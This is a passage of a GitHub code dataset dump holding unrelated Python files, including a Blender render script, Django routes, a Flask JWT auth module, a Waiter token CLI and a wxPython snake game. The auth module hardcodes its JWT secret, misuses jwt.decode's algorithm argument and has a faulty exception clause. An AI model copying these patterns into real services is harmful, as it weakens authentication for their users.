parser.add_argument('--distribution', type=str, help='distribution function for sim positioning',\n default='uniform')\n parser.add_argument('--layer_dir', type=str, help='directory for rendered layers', required=True)\n args = parser.parse_args()\n\n mkdirp(args.out_dir)\n mkdirp(args.sim_dir)\n\n # Generate Simulant Descriptor\n textures = find_filepaths(args.textures, 'png')\n poses = get_list(args.pose_list)\n\n sim_info = {'out_path': args.sim_dir,\n 'hair_path': args.hairs,\n 'clothes_path': args.clothes,\n 'textures': textures,\n 'poses': poses}\n\n sim_id = make_a_simulant(sim_info, args.out_dir)\n\n # Generate Scene Descriptor\n backgrounds = find_filepaths(args.backgrounds, 'hdr')\n\n # Random scene values\n scene_id = str(uuid.uuid4())\n background = random.choice(backgrounds)\n background_rotation = random.uniform(0, 360)\n\n scene_info = {'scene_id': scene_id,\n 'scene_path': os.path.join(args.scene_dir, '{}.blend'.format(scene_id)),\n 'background': background,\n 'background_rotation': background_rotation,\n 'hdri_intensity': 1,\n 'image_size': [720, 1280],\n 'percent_size': 100,\n 'tile_size': 32,\n 'distribution': args.distribution}\n\n with open(os.path.join(args.out_dir, '{}.json'.format(sim_id))) as jd:\n simulant = json.load(jd)\n objects = [update_layers(simulant, 0)]\n scene_info['objects'] = objects\n\n mkdirp(args.scene_dir)\n scene_json = os.path.join(args.out_dir, '{}.json'.format(scene_id))\n with open(scene_json, 'w') as outfile:\n json.dump(scene_info, outfile, indent=2)\n\n # Make a Scene\n scene_cmd = ['blender', '-b', '-P',\n 'bin/blender/make_a_scene.py', '--',\n '--info', scene_json,\n '--base_scene', 'data/base_scene.blend']\n \n subprocess.check_call(scene_cmd)\n\n # Render Scene\n command = ['blender', '-b', '-P',\n 'bin/blender/build_and_render_scene.py', '--',\n '--info', scene_json,\n '--out', args.layer_dir,\n '--base', 'data/base_scene.blend']\n\n subprocess.check_call(command)\n","repo_name":"atomicguy/simulants","sub_path":"bin/simulant_generator.py","file_name":"simulant_generator.py","file_ext":"py","file_size_in_byte":4177,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"18450980590","text":"#coding: utf-8\n\nfrom django.urls import path, re_path\nfrom maps.views import MapList, MapListPrice,MapDetail,PageDetail,AccList,GravList,ArchList #,list_by_tag\nfrom . 
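The two subprocess calls above use Blender's `--` convention: Blender ignores everything after `--`, and the driven script recovers those arguments from sys.argv. A minimal sketch of that recovery (the paths are the ones used above):

```python
import sys

def script_args(argv):
    """Arguments after '--', as seen by a script run via blender -b -P."""
    return argv[argv.index("--") + 1:] if "--" in argv else []

cmd = ['blender', '-b', '-P', 'bin/blender/make_a_scene.py', '--',
       '--info', 'scene.json', '--base_scene', 'data/base_scene.blend']
print(script_args(cmd))
# ['--info', 'scene.json', '--base_scene', 'data/base_scene.blend']
```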
import views\nfrom django.conf import settings\nfrom django.conf.urls.static import static\n\nurlpatterns = [\npath ('',MapList.as_view()),\npath ('engraving/', GravList.as_view()),\npath ('accessory/', AccList.as_view()),\npath ('archive/', ArchList.as_view()),\npath ('price', MapListPrice.as_view()),\npath ('items//',MapDetail.as_view()),\npath ('page//',PageDetail.as_view()),\npath ('tags//', MapList.as_view()),#list_by_tag),\n#path ('search/?q=', MapList.as_view()),#list_by_tag),\n#path(r'',views.MapListView.as_view()), # список карт\n]\nif settings.DEBUG:\n urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\n","repo_name":"abitty/maps4u","sub_path":"maps/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":850,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"74747970114","text":"results = {}\n\ndef memo(num, result):\n if results[num] is not None:\n return results[num]\n else:\n results[num] = result\n\ndef fib(n):\n fib_result = None\n assert n >= 0\n # ending conditions\n if n < 2:\n return n\n else:\n # recursive call\n return fib(n - 1) + fib(n - 2)\n \nif __name__ == '__main__':\n try:\n # fibs = [fib(i) for i in range(10)]\n # print(fibs)\n print(fib(25))\n except AssertionError:\n print('Invalid input to fib()')","repo_name":"zynth-punk/bhcc","sub_path":"2021_03Fall_CSC225_Advanced_Python/bko_class_exercises/fibona.py","file_name":"fibona.py","file_ext":"py","file_size_in_byte":462,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"29993778664","text":"class Karma:\n def __init__(self, db):\n self.db = db\n\n def set_karma(self, user, value):\n if self.db.exists(f\"user:{user}\") == 0:\n self.db.hset(f\"user:{user}\", \"karma\", value)\n else:\n karma = int(self.db.hget(f\"user:{user}\", \"karma\"))\n karma = int(karma) + value\n self.db.hset(f\"user:{user}\", \"karma\", str(karma))\n\n\n def handle_karma(self, string, chat, bot):\n if \"++\" in string:\n user = string.split(\"++\")[0]\n self.set_karma(user, 1)\n elif \"—\" in string:\n user = string.split(\"—\")[0]\n self.set_karma(user, -1)\n else:\n user = string.split(\" \")[1]\n self.set_karma(user, 0)\n karma = self.db.hget(f\"user:{user}\", \"karma\")\n bot.send_message(chat_id=chat.id, text=user+\" has \"+karma+\" karma\")","repo_name":"insomniac807/flask_bot","sub_path":"karma.py","file_name":"karma.py","file_ext":"py","file_size_in_byte":865,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"13180877789","text":"import binascii\nimport hashlib\nimport time\nimport jwt\nimport os\n\nfrom functools import wraps\nfrom flask import abort\nfrom flask import request, jsonify\nfrom api.repository.user_repository import UserRepository\n\nsecret = os.environ.get('SECRET') or \"secretAPI-RESTnodejs1234$\"\n\n\nclass Auth:\n\n @staticmethod\n def login(request):\n username = request.json['username']\n password = request.json['password']\n user = UserRepository.get_user_by_name(username)\n if user is None:\n return {\"Result\": False, \"Error\": \"El usuario no existe\"}, 401\n salt = hashlib.sha256(secret.encode('ascii')).hexdigest().encode('ascii')\n hash = hashlib.pbkdf2_hmac('sha512', password.encode('utf-8'),\n salt, 100000)\n hash = binascii.hexlify(hash).hex()\n if user.hash == hash:\n token = jwt.encode({\"username\": user.username, 'exp': int(time.time()) + 3600 * 24},\n secret, algorithm='HS256')\n 
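In the fibonacci record above, the memo() helper is never called, and its `results[num]` lookup would raise KeyError for any unseen key, so fib() runs in exponential time. One possible repair (a sketch, not necessarily the author's intended design) that keeps the same recursion but actually uses the cache:

```python
results = {}

def fib(n):
    assert n >= 0
    if n < 2:
        return n
    if n not in results:                 # membership test instead of indexing
        results[n] = fib(n - 1) + fib(n - 2)
    return results[n]

print(fib(25))  # 75025, with O(n) recursive calls instead of O(phi**n)
```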
return token\n else:\n return {\"Result\": False, \"Error\": \"Contraseña incorrecta\"}, 401\n\n\ndef token_required(f):\n @wraps(f)\n def decorated(*args, **kwargs):\n token = None\n if 'Authorization' in request.headers:\n token = request.headers['Authorization']\n if not token:\n return jsonify({\"meassage\": \"Token is missing\"}), 401\n try:\n jwt.decode(token, \"secretAPI-RESTnodejs1234$\", algorithm='HS256')\n except jwt.ExpiredSignatureError or jwt.InvalidTokenError:\n return jsonify({\"message\": \"Token is invalid\"}), 401\n return f(*args, **kwargs)\n\n return decorated\n","repo_name":"antonioalfa22/Python-API-Rest-Template","sub_path":"api/middlewares/auth.py","file_name":"auth.py","file_ext":"py","file_size_in_byte":1688,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"} +{"seq_id":"23582276701","text":"from __future__ import print_function\r\n\r\n\r\nclass Case:\r\n def __init__(self, d, n, enemies, case_num):\r\n self.case_num = case_num\r\n self.d = d\r\n self.n = n\r\n self.enemies = enemies\r\n self._debug = True\r\n\r\n\r\n def calculate(self):\r\n biggest_time = self._time(self.enemies[0])\r\n for enemy in self.enemies:\r\n time = self._time(enemy)\r\n if time > biggest_time:\r\n biggest_time = time\r\n\r\n result_str = 'Case #' + str(self.case_num) + ': ' + str(float(self.d)/biggest_time)+ '\\n'\r\n if self._debug:\r\n print(result_str)\r\n return result_str\r\n\r\n\r\n def _time(self, enemy):\r\n return (float(self.d - enemy[0]))/enemy[1]\r\n\r\n\r\n\r\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_206/995.py","file_name":"995.py","file_ext":"py","file_size_in_byte":745,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"12072049027","text":"import argparse\nimport logging\nfrom collections import defaultdict\nfrom enum import Enum\n\nimport requests\n\nfrom waiter import terminal, http_util\nfrom waiter.data_format import determine_format, display_data, load_data\nfrom waiter.querying import get_token, query_token, get_target_cluster_from_token\nfrom waiter.util import deep_merge, FALSE_STRINGS, is_admin_enabled, print_info, response_message, TRUE_STRINGS, \\\n guard_no_cluster, str2bool, update_in\n\nBOOL_STRINGS = TRUE_STRINGS + FALSE_STRINGS\nINT_PARAM_SUFFIXES = ['-failures', '-index', '-instances', '-length', '-level', '-mins', '-ms', '-secs']\nFLOAT_PARAM_SUFFIXES = ['-factor', '-rate', '-threshold']\nSTRING_PARAM_PREFIXES = ['env', 'metadata']\n\n\nclass Action(Enum):\n CREATE = 'create'\n UPDATE = 'update'\n INIT = 'init'\n\n def __str__(self):\n return f'{self.value}'\n\n def should_patch(self):\n return self is Action.UPDATE\n\n\ndef process_post_result(resp):\n \"\"\"Prints the result of a token POST\"\"\"\n resp_json = resp.json()\n if 'message' in resp_json:\n message = resp_json['message']\n print_info(f'{message}.')\n return\n\n raise Exception(f'{response_message(resp_json)}')\n\n\ndef post_failed_message(cluster_name, reason):\n \"\"\"Generates a failed token post message with the given cluster name and reason\"\"\"\n return f'Token post {terminal.failed(\"failed\")} on {cluster_name}:\\n{terminal.reason(reason)}'\n\n\ndef get_overrides(token_fields_base, token_fields_from_args):\n \"\"\"Returns true if there are any overrides from the token key args. 
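Two pitfalls in the auth record above are worth flagging. First, PyJWT's decode takes the plural keyword `algorithms` (a list); `algorithm=` is an encode-only argument, so the call as written either fails or does not pin the algorithm, depending on the PyJWT version. Second, `except jwt.ExpiredSignatureError or jwt.InvalidTokenError` evaluates the `or` first and catches only the first class; exception alternatives need a tuple. A corrected round trip:

```python
import time
import jwt

secret = "secretAPI-RESTnodejs1234$"
token = jwt.encode({"username": "demo", "exp": int(time.time()) + 60},
                   secret, algorithm="HS256")
try:
    payload = jwt.decode(token, secret, algorithms=["HS256"])  # plural, a list
    print(payload["username"])
except (jwt.ExpiredSignatureError, jwt.InvalidTokenError):     # tuple, not 'or'
    print("Token is invalid")
```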
Handles nested fields args split by a period.\"\"\"\n overrides = []\n for key_raw, _ in token_fields_from_args.items():\n keys = key_raw.split('.')\n base_ref = token_fields_base\n try:\n for key in keys:\n base_ref = base_ref[key]\n # no KeyError means that the token_fields_base has an existing value corresponding with the arg\n overrides.append(key_raw)\n except KeyError:\n pass\n return overrides\n\n\ndef merge_token_fields_from_args(token_fields_base, token_fields_from_args):\n \"\"\"Merges token fields from json and token fields from args. Handles nested fields args split by a period.\"\"\"\n token_fields = {**token_fields_base}\n for key_raw, value in token_fields_from_args.items():\n keys = key_raw.split('.')\n update_in(token_fields, keys, value)\n return token_fields\n\n\ndef create_or_update(cluster, token_name, token_fields, admin_mode, action, fields_from_args_only, output):\n \"\"\"Creates (or updates) the given token on the given cluster\"\"\"\n cluster_name = cluster['name']\n cluster_url = cluster['url']\n\n existing_token_data, existing_token_etag = get_token(cluster, token_name)\n try:\n print_info(f'Attempting to {action} token {(\"in ADMIN mode \" if admin_mode else \"\")}'\n f'{(\"with dry-run enabled \" if output else \"\")}on {terminal.bold(cluster_name)}...')\n params = {'token': token_name}\n if admin_mode:\n params['update-mode'] = 'admin'\n json_body = existing_token_data if existing_token_data and action.should_patch() else {}\n if fields_from_args_only and action.should_patch():\n json_body = deep_merge(json_body, token_fields)\n else:\n json_body.update(token_fields)\n if output is None:\n headers = {'If-Match': existing_token_etag or ''}\n resp = http_util.post(cluster, 'token', json_body, params=params, headers=headers)\n process_post_result(resp)\n elif output == '-':\n print_info('Token configuration (as json) is:')\n display_data({'json': True}, json_body)\n else:\n output_format = 'json' if output.endswith('.json') else 'yaml'\n output_options = {output_format: True}\n data_format = determine_format(output_options)\n print_info(f'Writing token configuration (as {output_format}) to {output}')\n with open(output, 'w') as out_file:\n data_format.dump(json_body, out_file)\n return 0\n except requests.exceptions.ReadTimeout as rt:\n logging.exception(rt)\n print_info(terminal.failed(\n f'Encountered read timeout with {cluster_name} ({cluster_url}). 
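merge_token_fields_from_args above leans on waiter's update_in to write a dotted key like `env.FOO` into a nested dict. A self-contained sketch of that mechanism, where update_in is a hypothetical stand-in whose behavior is inferred from its call site:

```python
def update_in(d, keys, value):
    """Hypothetical stand-in for waiter.util.update_in (inferred behavior)."""
    for key in keys[:-1]:
        d = d.setdefault(key, {})      # create intermediate dicts as needed
    d[keys[-1]] = value

token = {"cpus": 0.1, "env": {"FOO": "bar"}}
for dotted, value in {"env.BAZ": "qux", "mem": 256}.items():
    update_in(token, dotted.split("."), value)
print(token)  # {'cpus': 0.1, 'env': {'FOO': 'bar', 'BAZ': 'qux'}, 'mem': 256}
```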
Your post may have completed.'))\n return 1\n except IOError as ioe:\n logging.exception(ioe)\n reason = f'Cannot connect to {cluster_name} ({cluster_url})'\n message = post_failed_message(cluster_name, reason)\n print_info(f'{message}\\n')\n\n\ndef pop_context_override_args(args):\n context_overrides = {}\n for k in list(args.keys()):\n if k.startswith('context.'):\n v = args.pop(k)\n context_overrides[k] = v\n if context_overrides:\n return merge_token_fields_from_args({}, context_overrides)['context']\n else:\n return None\n\n\ndef create_or_update_token(clusters, args, _, enforce_cluster, action):\n \"\"\"Creates (or updates) a Waiter token\"\"\"\n guard_no_cluster(clusters)\n logging.debug('args: %s' % args)\n token_name_from_args = args.pop('token', None)\n json_file = args.pop('json', None)\n yaml_file = args.pop('yaml', None)\n input_file = args.pop('input', None)\n admin_mode = args.pop('admin', None)\n output = args.pop('output', None)\n allow_override = args.pop('override', False)\n context_file = args.pop('context', None)\n context_overrides = pop_context_override_args(args)\n\n if input_file or json_file or yaml_file:\n token_fields_from_json = load_data({'context_file': context_file,\n 'context_overrides': context_overrides,\n 'data': input_file,\n 'json': json_file,\n 'yaml': yaml_file})\n fields_from_args_only = False\n else:\n if context_file:\n raise Exception('The --context file can only be used when a data file is specified via '\n '--input, --json, or --yaml.')\n if context_overrides:\n raise Exception('The --context.xyz overrides can only be used when a data file is specified via '\n '--input, --json, or --yaml.')\n token_fields_from_json = {}\n fields_from_args_only = True\n\n token_fields_from_args = args\n overrides = get_overrides(token_fields_from_json, token_fields_from_args)\n if overrides:\n if not allow_override:\n raise Exception(f'You cannot specify the same parameter in both an input file '\n f'and token field flags at the same time ({\", \".join(overrides)}) '\n f'without specifying the --override flag.')\n else:\n logging.debug(f'Following parameters have specified values in both file and flags: {overrides}')\n token_fields = merge_token_fields_from_args(token_fields_from_json, token_fields_from_args)\n token_name_from_json = token_fields.pop('token', None)\n if token_name_from_args and token_name_from_json:\n if not allow_override:\n raise Exception('You cannot specify the token name both as an argument and in the input file '\n 'without specifying the --override flag.')\n else:\n logging.debug(f'Will use token ({token_name_from_args}) from args and '\n f'skip token specified in file({token_name_from_json})')\n\n token_name = token_name_from_args or token_name_from_json\n if not token_name:\n raise Exception('You must specify the token name either as an argument or in an input file via '\n '--json or --yaml.')\n\n if len(clusters) > 1:\n default_for_create = [c for c in clusters if c.get('default-for-create', False)]\n num_default_create_clusters = len(default_for_create)\n if num_default_create_clusters == 0:\n raise Exception('You must either specify a cluster via --cluster or set \"default-for-create\" to true for '\n 'one of your configured clusters.')\n elif num_default_create_clusters > 1:\n raise Exception('You have \"default-for-create\" set to true for more than one cluster.')\n else:\n query_result = query_token(clusters, token_name)\n if query_result['count'] > 0:\n cluster = get_target_cluster_from_token(clusters, token_name, 
enforce_cluster)\n logging.debug(f'token already exists in: {cluster}')\n else:\n cluster = default_for_create[0]\n else:\n cluster = clusters[0]\n\n return create_or_update(cluster, token_name, token_fields, admin_mode, action, fields_from_args_only, output)\n\n\ndef add_arguments(parser):\n \"\"\"Adds arguments to the given parser\"\"\"\n add_token_flags(parser)\n parser.add_argument('token', nargs='?')\n if is_admin_enabled():\n parser.add_argument('--admin', '-a', help='run command in admin mode', action='store_true')\n format_group = parser.add_mutually_exclusive_group()\n format_group.add_argument('--json', help='provide the data in a JSON file', dest='json')\n format_group.add_argument('--yaml', help='provide the data in a YAML file', dest='yaml')\n format_group.add_argument('--input', help='provide the data in a JSON/YAML file', dest='input')\n parser.add_argument('--output', help='outputs the computed token configuration in a JSON/YAML file (or to stdout using -)'\n 'without performing any token edit operations')\n parser.add_argument('--context', dest='context',\n help='can be used only when a data file has been provided via --input, --json, or --yaml; '\n 'this JSON/YAML file provides the context variables used '\n 'to render the data file as a template')\n add_override_flags(parser)\n\n\ndef add_token_flags(parser):\n \"\"\"Adds the \"core\" token-field flags to the given parser\"\"\"\n parser.add_argument('--name', '-n', help='name of service')\n parser.add_argument('--owner', '-o', help='owner of service')\n parser.add_argument('--version', '-v', help='version of service')\n parser.add_argument('--cmd', '-C', help='command to start service')\n parser.add_argument('--cmd-type', '-t', help='command type of service (e.g. \"shell\")', dest='cmd-type')\n parser.add_argument('--cpus', '-c', help='cpus to reserve for service', type=float)\n parser.add_argument('--mem', '-m', help='memory (in MiB) to reserve for service', type=int)\n parser.add_argument('--ports', help='number of ports to reserve for service', type=int)\n\n\ndef add_override_flags(parser):\n \"\"\"Adds the arguments override file values flags to the given parser\"\"\"\n override_group = parser.add_mutually_exclusive_group(required=False)\n override_group.add_argument('--override', action='store_true', dest='override',\n help='Allow overriding values in input file with values from CLI arguments. '\n 'Overriding values is disallowed by default. '\n 'Adding the --no-override flag explicitly disallows overriding values.')\n override_group.add_argument('--no-override', action='store_false', dest='override', help=argparse.SUPPRESS)\n\n\ndef register_argument_parser(add_parser, action):\n \"\"\"Calls add_parser for the given sub-command (create or update) and returns the parser\"\"\"\n sub_command = str(action)\n return add_parser(sub_command,\n help=f'{sub_command} token',\n description=f'{sub_command.capitalize()} a Waiter token. '\n 'In addition to the optional arguments '\n 'explicitly listed below, '\n 'you can optionally provide any Waiter '\n 'token parameter as a flag. For example, '\n 'to specify 10 seconds for the '\n 'grace-period-secs parameter, '\n 'you can pass --grace-period-secs 10. '\n 'You can also provide nested fields separated by a period. 
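The cluster-selection branch above encodes a small decision table: one configured cluster wins outright; otherwise exactly one cluster must be marked default-for-create, and a token that already exists somewhere overrides that default. Restated compactly (function and parameter names here are illustrative, not waiter's API):

```python
def pick_create_cluster(clusters, find_existing):
    """find_existing() returns the cluster already holding the token, or None."""
    if len(clusters) == 1:
        return clusters[0]
    defaults = [c for c in clusters if c.get('default-for-create', False)]
    if len(defaults) == 0:
        raise Exception('set "default-for-create" on one cluster or pass --cluster')
    if len(defaults) > 1:
        raise Exception('"default-for-create" is set on more than one cluster')
    return find_existing() or defaults[0]
```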
For example, '\n 'to specify an environment variable FOO as \\\"bar\\\", you can pass --env.FOO \\\"bar\\\".')\n\n\ndef possible_int(arg):\n \"\"\"Attempts to parse arg as an int, returning the string otherwise\"\"\"\n try:\n return int(arg)\n except ValueError:\n logging.info(f'failed to parse {arg} as an int, treating it as a string')\n return arg\n\n\ndef possible_float(arg):\n \"\"\"Attempts to parse arg as a float, returning the string otherwise\"\"\"\n try:\n return float(arg)\n except ValueError:\n logging.info(f'failed to parse {arg} as a float, treating it as a string')\n return arg\n\n\ndef add_implicit_arguments(unknown_args, parser):\n \"\"\"\n Given the list of \"unknown\" args, dynamically adds proper arguments to\n the subparser, allowing us to support any token parameter as a flag\n \"\"\"\n num_unknown_args = len(unknown_args)\n for i in range(num_unknown_args):\n arg = unknown_args[i]\n if arg.startswith((\"-\", \"--\")):\n arg_dest = arg.lstrip('-')\n if any(arg_dest.startswith(prefix) for prefix in STRING_PARAM_PREFIXES):\n arg_type = None\n elif any(arg.endswith(suffix) for suffix in INT_PARAM_SUFFIXES):\n arg_type = possible_int\n elif any(arg.endswith(suffix) for suffix in FLOAT_PARAM_SUFFIXES):\n arg_type = possible_float\n elif (i + 1) < num_unknown_args and unknown_args[i + 1].lower() in BOOL_STRINGS:\n arg_type = str2bool\n else:\n arg_type = None\n parser.add_argument(arg, dest=arg_dest, type=arg_type)\n","repo_name":"twosigma/waiter","sub_path":"cli/waiter/token_post.py","file_name":"token_post.py","file_ext":"py","file_size_in_byte":13950,"program_lang":"python","lang":"en","doc_type":"code","stars":84,"dataset":"github-code","pt":"61"} +{"seq_id":"70151649795","text":"# -*- coding: utf-8 -*-\n# @Author: JinZhang\n# @Date: 2018-12-25 10:31:47\n# @Last Modified by: JinZhang\n# @Last Modified time: 2019-01-23 15:29:27\nimport wx;\nimport random;\n\nfrom Snake import Direction, Snake;\n\nDirectionConfig = {\n\tDirection.LEFT : \"HORIZONTAL\",\n\tDirection.RIGHT : \"HORIZONTAL\",\n\tDirection.TOP : \"VERTICAL\",\n\tDirection.BOTTOM : \"VERTICAL\",\n};\n\nclass SnakeView(wx.Panel):\n\t\"\"\"docstring for SnakeView\"\"\"\n\tdef __init__(self, parent, id = -1, params = {}):\n\t\tself.initParams(params);\n\t\tsuper(SnakeView, self).__init__(parent, id, pos = self.params_[\"pos\"], size = self.params_[\"size\"], style = self.params_[\"style\"]);\n\t\tself.SetBackgroundColour(self.params_[\"bgColour\"]);\n\t\tself.createSnake();\n\t\tself.createTimer();\n\t\tself.m_playing = False; # 游戏进行中的标记\n\t\tself.m_foodInfoMap = {}; # 食物信息表【key = idx, value = item】\n\t\tself.m_direction = self.m_snake.m_direction; # 初始化方向\n\n\tdef __del__(self):\n\t\tself.stopTimer();\n\n\tdef initParams(self, params):\n\t\tself.params_ = {\n\t\t\t\"pos\" : (0,0),\n\t\t\t\"size\" : (360,360),\n\t\t\t\"style\" : wx.BORDER_NONE,\n\t\t\t\"bgColour\" : wx.Colour(255,255,255),\n\t\t\t\"matrix\" : (36,36),\n\t\t\t\"snakeColour\" : wx.Colour(0,0,0),\n\t\t\t\"foodColour\" : wx.Colour(0,200,0),\n\t\t};\n\t\tfor k,v in params.items():\n\t\t\tself.params_[k] = v;\n\n\t# 创建蛇体\n\tdef createSnake(self):\n\t\tparams = {\n\t\t\t\"size\" : self.getItemSize(),\n\t\t\t\"bgColour\" : self.params_[\"snakeColour\"],\n\t\t\t\"matrix\" : self.params_[\"matrix\"],\n\t\t};\n\t\tself.m_snake = Snake(params = params);\n\n\tdef createTimer(self):\n\t\tself.m_timer = wx.Timer(self);\n\t\tself.Bind(wx.EVT_TIMER, self.onTimer, self.m_timer);\n\n\tdef startTimer(self):\n\t\tself.m_timer.Start(100);\n\n\tdef 
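add_implicit_arguments above turns unknown `--flags` into real argparse arguments, guessing each type from the parameter name's suffix. A compressed sketch of that inference, using a subset of the suffix lists defined at the top of the module:

```python
import argparse

INT_SUFFIXES = ('-secs', '-mins', '-instances')   # subset of INT_PARAM_SUFFIXES
FLOAT_SUFFIXES = ('-factor', '-threshold')        # subset of FLOAT_PARAM_SUFFIXES

parser = argparse.ArgumentParser()
for flag in ('--grace-period-secs', '--scale-factor', '--image'):
    if flag.endswith(INT_SUFFIXES):
        arg_type = int
    elif flag.endswith(FLOAT_SUFFIXES):
        arg_type = float
    else:
        arg_type = None                           # leave the value as a string
    parser.add_argument(flag, dest=flag.lstrip('-'), type=arg_type)

args = parser.parse_args('--grace-period-secs 10 --scale-factor 1.5 --image x'.split())
print(vars(args))  # {'grace-period-secs': 10, 'scale-factor': 1.5, 'image': 'x'}
```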
stopTimer(self):\n\t\tif self.m_timer.IsRunning():\n\t\t\tself.m_timer.Stop();\n\n\tdef initView(self):\n\t\tself.createControls();\n\t\tself.initViewLayout();\n\n\tdef createControls(self):\n\t\tpass;\n\n\tdef initViewLayout(self):\n\t\tpass;\n\n\tdef getItemSize(self):\n\t\trows, cols = self.params_[\"matrix\"][0], self.params_[\"matrix\"][1];\n\t\treturn wx.Size(self.params_[\"size\"][0]/cols, self.params_[\"size\"][1]/rows);\n\n\tdef createItem(self):\n\t\tp = wx.Panel(self, size = self.getItemSize(), style = wx.BORDER_NONE);\n\t\tp.m_text = wx.StaticText(p, label = \"9\");\n\t\tp.m_text.SetFont(wx.Font(6, wx.FONTFAMILY_DEFAULT, wx.FONTSTYLE_NORMAL, wx.FONTWEIGHT_NORMAL));\n\t\tbox = wx.BoxSizer(wx.HORIZONTAL);\n\t\tbox.Add(p.m_text, flag = wx.ALIGN_CENTER);\n\t\tp.SetSizer(box)\n\t\tp.m_timer = wx.Timer(p);\n\t\tp.m_isFlash = False;\n\t\tdef onItemTimer(event = None):\n\t\t\tremainTime = int(p.m_text.GetLabel()) - 1;\n\t\t\tif remainTime >= 0:\n\t\t\t\tp.m_text.SetLabel(str(remainTime));\n\t\t\t\tif p.m_isFlash:\n\t\t\t\t\tif p.IsShown():\n\t\t\t\t\t\tp.Hide();\n\t\t\t\t\telse:\n\t\t\t\t\t\tp.Show();\n\t\t\t\tif remainTime <= 3 and not p.m_isFlash:\n\t\t\t\t\tp.m_text.SetLabel(str(remainTime * 10));\n\t\t\t\t\tp.m_isFlash = True;\n\t\t\t\t\tp.m_timer.Stop();\n\t\t\t\t\tp.m_timer.Start(100);\n\t\t\telse:\n\t\t\t\tidx = self.m_snake.getIdx(p.GetPosition());\n\t\t\t\tif idx in self.m_foodInfoMap:\n\t\t\t\t\tself.createFoodItem();\n\t\t\t\t\tfoodItem = self.m_foodInfoMap.pop(idx);\n\t\t\t\t\tfoodItem.Destroy();\n\t\tp.Bind(wx.EVT_TIMER, onItemTimer, p.m_timer);\n\t\tp.m_timer.Start(1000);\n\t\treturn p;\n\n\tdef moveSnake(self):\n\t\tret,idx = self.m_snake.check();\n\t\tif ret:\n\t\t\tif idx in self.m_foodInfoMap:\n\t\t\t\tself.m_snake.eat(self.m_foodInfoMap[idx]);\n\t\t\t\tself.createFoodItem();\n\t\t\t\tdel self.m_foodInfoMap[idx];\n\t\t\telse:\n\t\t\t\tself.m_snake.move(idx);\n\t\telse:\n\t\t\tself.gameOver();\n\n\tdef gameOver(self):\n\t\tself.stopTimer();\n\t\tself.m_playing = False;\n\t\tmsgDialog = wx.MessageDialog(self, \"游戏结束!\", \"游戏结束\", style = wx.OK|wx.ICON_INFORMATION);\n\t\tmsgDialog.ShowModal();\n\n\tdef onTimer(self, event = None):\n\t\tself.moveSnake();\n\t\tself.m_direction = self.m_snake.m_direction;\n\n\tdef initGame(self):\n\t\trow = int(self.params_[\"matrix\"][0]/2);\n\t\tcol = int(self.params_[\"matrix\"][1]/2);\n\t\titemPos = self.m_snake.getPos(row = row, col = col);\n\t\titem = self.createItem();\n\t\titem.Move(itemPos.x, itemPos.y);\n\t\titem.SetBackgroundColour(self.params_[\"foodColour\"]);\n\t\titem.Refresh();\n\t\tdirection = random.choice([Direction.LEFT, Direction.TOP, Direction.RIGHT, Direction.BOTTOM]);\n\t\tself.m_snake.setDirection(direction);\n\t\tself.m_snake.eat(item);\n\n\tdef startGame(self, event = None):\n\t\tif not self.m_playing:\n\t\t\tself.initGame();\n\t\t\tfor i in range(3):\n\t\t\t\tself.createFoodItem();\n\t\t\tself.startTimer();\n\t\t\tself.m_playing = True;\n\n\tdef createFoodItem(self):\n\t\tidx = random.randint(0, len(self.m_snake.getBlankIdxs())-1);\n\t\titemPos = self.m_snake.getPos(idx = idx);\n\t\titem = self.createItem();\n\t\titem.Move(itemPos.x, itemPos.y);\n\t\titem.SetBackgroundColour(self.params_[\"foodColour\"]);\n\t\titem.Refresh();\n\t\tself.m_foodInfoMap[idx] = item;\n\n\tdef updateDirection(self, direction):\n\t\tif direction in DirectionConfig and DirectionConfig[self.m_direction] != DirectionConfig[direction]:\n\t\t\tself.m_snake.setDirection(direction);\n\n\nif __name__ == '__main__':\n\tapp = wx.App();\n\tframe = 
wx.Frame(None, size = (800,700));\n\n\tpanel = wx.Panel(frame);\n\tpanel.SetBackgroundColour(\"black\");\n\tsn = SnakeView(panel, params = {\"pos\" : (40,40), \"size\" : (600,600), \"matrix\" : (60,60)})\n\tbtn = wx.Button(panel, label = \"开始游戏\");\n\tbtn.Bind(wx.EVT_BUTTON, sn.startGame);\n\tboxSizer = wx.BoxSizer(wx.HORIZONTAL);\n\tboxSizer.Add(btn);\n\tboxSizer.Add(sn);\n\tpanel.SetSizer(boxSizer);\n\n\tdef onCharHook(event = None):\n\t\tif event:\n\t\t\tevent.DoAllowNextEvent();\n\t\t\tif event.GetUnicodeKey() == 0:\n\t\t\t\tif event.GetKeyCode() == 314:\n\t\t\t\t\tsn.updateDirection(Direction.LEFT);\n\t\t\t\tif event.GetKeyCode() == 315:\n\t\t\t\t\tsn.updateDirection(Direction.TOP);\n\t\t\t\tif event.GetKeyCode() == 316:\n\t\t\t\t\tsn.updateDirection(Direction.RIGHT);\n\t\t\t\tif event.GetKeyCode() == 317:\n\t\t\t\t\tsn.updateDirection(Direction.BOTTOM);\n\tapp.Bind(wx.EVT_CHAR_HOOK, onCharHook)\n\n\tframe.Show(True);\n\tapp.MainLoop();\n","repo_name":"JDreamHeart/DailyCodes","sub_path":"python/wx模块相关/贪吃蛇/SnakeView.py","file_name":"SnakeView.py","file_ext":"py","file_size_in_byte":5738,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"11098971185","text":"#15650 N과 M(2)\n\n##itertools\nfrom itertools import combinations as comb\n\nn, m = map(int, input().split())\nnum = [i for i in range(1, n+1)]\n\narr = list(comb(num, m))\narr.sort()\n\nfor i in arr:\n print(' '.join(map(str, i)))\n\n##backtracking\nn, m = map(int, input().split())\ns = []\ndef sol(cnt):\n if len(s) == m:\n print(' '.join(map(str, s)))\n for i in 